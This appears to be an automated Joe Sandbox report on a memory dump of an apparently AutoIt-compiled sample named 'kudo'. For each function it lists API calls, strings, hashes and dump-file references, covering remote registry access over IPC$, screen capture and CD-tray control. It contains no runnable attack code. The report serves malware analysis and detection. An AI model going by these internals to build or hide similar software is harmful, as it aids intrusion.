                                                      • Instruction ID: 85d91202863415961a17800140d092b9033f5d8d3d7aeef20e78810c0a6777e2
                                                      • Opcode Fuzzy Hash: 949e23ba17ed6d92d001fc079a23e2c4b2d090435f941c647d4bcd62dff62052
                                                      • Instruction Fuzzy Hash: 3471AB70181205AFEB25DF28CC48F6A7BE5FB88704F04452EFA85C72A1D7B4E946CB56
                                                      Function 00884392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00884424
                                                      • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0088446F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: BuffCharMessageSendUpper
                                                      • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                      • API String ID: 3974292440-4258414348
                                                      • Opcode ID: 993a63dfa60ae1fb8fd875732297ca08421e32e90277a22aae1cd943cd921d55
                                                      • Instruction ID: 0e4f187bc7a51509e7b687fd1beaec5e61dcef4e4094791bea5b26ef6adf22d5
                                                      • Opcode Fuzzy Hash: 993a63dfa60ae1fb8fd875732297ca08421e32e90277a22aae1cd943cd921d55
                                                      • Instruction Fuzzy Hash: 6A915C712047129BCB04EF18C851A6EB7A1FF95354F548868F896DB3A3DB31ED49CB82
                                                      Function 0088B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0088B8B4
                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008891C2), ref: 0088B910
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088B949
                                                      • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0088B98C
                                                      • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0088B9C3
                                                      • FreeLibrary.KERNEL32(?), ref: 0088B9CF
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0088B9DF
                                                      • DestroyCursor.USER32(?), ref: 0088B9EE
                                                      • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0088BA0B
                                                      • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0088BA17
                                                        • Part of subcall function 00822EFD: __wcsicmp_l.LIBCMT ref: 00822F86
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                      • String ID: .dll$.exe$.icl
                                                      • API String ID: 3907162815-1154884017
                                                      • Opcode ID: fd89b67c4b5f8dcd75ca4f24ddb924e01e5c771f5d7af8575f8572fc4a356d5f
                                                      • Instruction ID: 622ccecfa83ed4bd18f56b07353358b5d3f7b89d0ce6e7a7f788920165ec6581
                                                      • Opcode Fuzzy Hash: fd89b67c4b5f8dcd75ca4f24ddb924e01e5c771f5d7af8575f8572fc4a356d5f
                                                      • Instruction Fuzzy Hash: 8D61E371540229BAEB14EF68DC41FBE7BACFF08721F108115FA15D61D2EB74A990DBA0
                                                      Function 0086A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00809837: __itow.LIBCMT ref: 00809862
                                                        • Part of subcall function 00809837: __swprintf.LIBCMT ref: 008098AC
                                                      • CharLowerBuffW.USER32(?,?), ref: 0086A3CB
                                                      • GetDriveTypeW.KERNEL32 ref: 0086A418
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A460
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A497
                                                      • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0086A4C5
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                      • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                      • API String ID: 2698844021-4113822522
                                                      • Opcode ID: 4e33fe0e60dc0cd65ae10a557dff6bee825cc7bbe786e611137f9d49e249e6d3
                                                      • Instruction ID: 0a5d1d51ba26ef77f11b9b3a9f0b140dc291dbea7e4f8f4b5e39c48fd2c1e2c1
                                                      • Opcode Fuzzy Hash: 4e33fe0e60dc0cd65ae10a557dff6bee825cc7bbe786e611137f9d49e249e6d3
                                                      • Instruction Fuzzy Hash: 7D512A715042059FC744EF14CC9196AB7E8FF94718F50886DF89AA73A2DB31AD09CF52
                                                      Function 0085F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,0083E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0085F8DF
                                                      • LoadStringW.USER32(00000000,?,0083E029,00000001), ref: 0085F8E8
                                                        • Part of subcall function 00807DE1: _memmove.LIBCMT ref: 00807E22
                                                      • GetModuleHandleW.KERNEL32(00000000,008C5310,?,00000FFF,?,?,0083E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0085F90A
                                                      • LoadStringW.USER32(00000000,?,0083E029,00000001), ref: 0085F90D
                                                      • __swprintf.LIBCMT ref: 0085F95D
                                                      • __swprintf.LIBCMT ref: 0085F96E
                                                      • _wprintf.LIBCMT ref: 0085FA17
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0085FA2E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                      • API String ID: 984253442-2268648507
                                                      • Opcode ID: 1f60dafbacc79175e9caee8b148214624572f907b14510011796d5b69e88ecea
                                                      • Instruction ID: d6c13dfff4fe4801833c8b3a751d9eede6e7d37079775a103adff85957709c1a
                                                      • Opcode Fuzzy Hash: 1f60dafbacc79175e9caee8b148214624572f907b14510011796d5b69e88ecea
                                                      • Instruction Fuzzy Hash: 84413C72800119AACF05FBE8DD96DEE7778FF14305F500065BA05F2192EA356F49CB62
                                                      Function 0088BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0088BA56
                                                      • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA6D
                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00889207,?,?,00000000,?), ref: 0088BA78
                                                      • CloseHandle.KERNEL32(00000000), ref: 0088BA85
                                                      • GlobalLock.KERNEL32(00000000), ref: 0088BA8E
                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0088BA9D
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0088BAA6
                                                      • CloseHandle.KERNEL32(00000000), ref: 0088BAAD
                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0088BABE
                                                      • OleLoadPicture.OLEAUT32(?,00000000,00000000,00892CAC,?), ref: 0088BAD7
                                                      • GlobalFree.KERNEL32(00000000), ref: 0088BAE7
                                                      • GetObjectW.GDI32(00000000,00000018,?), ref: 0088BB0B
                                                      • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0088BB36
                                                      • DeleteObject.GDI32(00000000), ref: 0088BB5E
                                                      • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0088BB74
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                      • String ID:
                                                      • API String ID: 3840717409-0
                                                      • Opcode ID: b03c89a5ac31746fe339aa1d7c9400a08140b55621943ce33c3a55c3f13962f2
                                                      • Instruction ID: 76f18a920ec3ede86582493f449f9745b5fa1ece70f10eb2ef2ab41ea6252e83
                                                      • Opcode Fuzzy Hash: b03c89a5ac31746fe339aa1d7c9400a08140b55621943ce33c3a55c3f13962f2
                                                      • Instruction Fuzzy Hash: 43411A75601208EFDB21AF69DC88EAB7BB8FF89721F104069FA09D7261D7309D01DB60
                                                      Function 0086D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • __wsplitpath.LIBCMT ref: 0086DA10
                                                      • _wcscat.LIBCMT ref: 0086DA28
                                                      • _wcscat.LIBCMT ref: 0086DA3A
                                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0086DA4F
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086DA63
                                                      • GetFileAttributesW.KERNEL32(?), ref: 0086DA7B
                                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 0086DA95
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 0086DAA7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                      • String ID: *.*
                                                      • API String ID: 34673085-438819550
                                                      • Opcode ID: 090d0e94bcdd8f51654c487d7e30663e532a72071ee6fa8634644a685d5b4455
                                                      • Instruction ID: 6deaf191bbdbae7557c5144fa7e4df1b96fb0fd04530c9c62c5f08ac286d6926
                                                      • Opcode Fuzzy Hash: 090d0e94bcdd8f51654c487d7e30663e532a72071ee6fa8634644a685d5b4455
                                                      • Instruction Fuzzy Hash: 32818471A043459FCB64DF68C84596ABBE4FF89314F198C2EF889CB251D730D945CB52
                                                      Function 0087731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetDC.USER32(00000000), ref: 0087738F
                                                      • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0087739B
                                                      • CreateCompatibleDC.GDI32(?), ref: 008773A7
                                                      • SelectObject.GDI32(00000000,?), ref: 008773B4
                                                      • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00877408
                                                      • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00877444
                                                      • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00877468
                                                      • SelectObject.GDI32(00000006,?), ref: 00877470
                                                      • DeleteObject.GDI32(?), ref: 00877479
                                                      • DeleteDC.GDI32(00000006), ref: 00877480
                                                      • ReleaseDC.USER32(00000000,?), ref: 0087748B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                      • String ID: (
                                                      • API String ID: 2598888154-3887548279
                                                      • Opcode ID: 94f4ad18ebe1940f900a3c13a73b67fe0b23bff756948aab6adb37838cecf16c
                                                      • Instruction ID: 1b66339ff0af9e626e9adfe4608241ff4f7f6303a7260f8b5f5ae7a97cede2ea
                                                      • Opcode Fuzzy Hash: 94f4ad18ebe1940f900a3c13a73b67fe0b23bff756948aab6adb37838cecf16c
                                                      • Instruction Fuzzy Hash: AB513775904209EFCB14CFA8CC84EAEBBB9FF48310F148529FA5AE7211D731A940DB50
                                                      Function 00806A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00820957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00806B0C,?,00008000), ref: 00820973
                                                        • Part of subcall function 00804750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00804743,?,?,008037AE,?), ref: 00804770
                                                      • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00806BAD
                                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00806CFA
                                                        • Part of subcall function 0080586D: _wcscpy.LIBCMT ref: 008058A5
                                                        • Part of subcall function 0082363D: _iswctype.LIBCMT ref: 00823645
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                      • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                      • API String ID: 537147316-1018226102
                                                      • Opcode ID: 7a6e95dcb6a24ee417d78eec0c11be17664fcc991f65536250dcc913a5ffbdb3
                                                      • Instruction ID: 5358cb425c65f57371f7f9d6850981d5f28b056ece200ca7a89461125b9997f9
                                                      • Opcode Fuzzy Hash: 7a6e95dcb6a24ee417d78eec0c11be17664fcc991f65536250dcc913a5ffbdb3
                                                      • Instruction Fuzzy Hash: B10266301083419FC764EF28C8819AFBBE5FF99314F10492DF996D72A2EA319959CB53
                                                      Function 00862D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 00862D50
                                                      • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00862DDD
                                                      • GetMenuItemCount.USER32(008C5890), ref: 00862E66
                                                      • DeleteMenu.USER32(008C5890,00000005,00000000), ref: 00862EF6
                                                      • DeleteMenu.USER32(008C5890,00000004,00000000), ref: 00862EFE
                                                      • DeleteMenu.USER32(008C5890,00000006,00000000), ref: 00862F06
                                                      • DeleteMenu.USER32(008C5890,00000003,00000000), ref: 00862F0E
                                                      • GetMenuItemCount.USER32(008C5890), ref: 00862F16
                                                      • SetMenuItemInfoW.USER32(008C5890,00000004,00000000,00000030), ref: 00862F4C
                                                      • GetCursorPos.USER32(?), ref: 00862F56
                                                      • SetForegroundWindow.USER32(00000000), ref: 00862F5F
                                                      • TrackPopupMenuEx.USER32(008C5890,00000000,?,00000000,00000000,00000000), ref: 00862F72
                                                      • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00862F7E
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                      • String ID:
                                                      • API String ID: 3993528054-0
                                                      • Opcode ID: c2f8660b3cb060c8ffb42f8c1c0d951d1c058d862f58abae45609fcda02ff160
                                                      • Instruction ID: 83175465bd051a60077821cd9e9b72ab3e7808f1003496dccc09f25d31d14e88
                                                      • Opcode Fuzzy Hash: c2f8660b3cb060c8ffb42f8c1c0d951d1c058d862f58abae45609fcda02ff160
                                                      • Instruction Fuzzy Hash: 55710970601A09BFEB219F58DC49FAABF64FF04364F110266F615EA1E2C7726C60D791
                                                      Function 008577DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00807BCC: _memmove.LIBCMT ref: 00807C06
                                                      • _memset.LIBCMT ref: 0085786B
                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 008578A0
                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 008578BC
                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 008578D8
                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00857902
                                                      • CLSIDFromString.OLE32(?,?), ref: 0085792A
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00857935
                                                      • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0085793A
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                      • API String ID: 1411258926-22481851
                                                      • Opcode ID: e8ca1aa5cda97f00461e91cc9d637e7319e902a290d3c82f72597091f910040c
                                                      • Instruction ID: da64e865793f63624ad14518dee65291d8a36a645fd578ae4a4a5f5597dc4918
                                                      • Opcode Fuzzy Hash: e8ca1aa5cda97f00461e91cc9d637e7319e902a290d3c82f72597091f910040c
                                                      • Instruction Fuzzy Hash: 50410972C1462DAADF11EBA8EC45DEEB778FF14311F404069E915E32A1DB356D08CBA1
                                                      Function 00880E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CharUpperBuffW.USER32(?,?), ref: 00880E31
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
